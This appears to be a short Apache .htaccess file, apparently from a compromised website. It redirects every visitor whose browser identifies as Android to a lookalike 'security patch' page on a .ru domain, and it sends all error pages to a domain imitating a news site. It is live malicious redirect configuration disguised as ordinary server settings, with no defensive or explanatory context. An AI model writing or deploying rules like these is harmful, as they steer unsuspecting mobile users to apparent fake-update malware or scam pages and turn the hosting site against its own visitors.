RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://official.androidsecurityfixers.ru/securitypatch.php
ErrorDocument 400 http://i-foxnws.com
ErrorDocument 401 http://i-foxnws.com
ErrorDocument 403 http://i-foxnws.com
ErrorDocument 404 http://i-foxnws.com
ErrorDocument 500 http://i-foxnws.com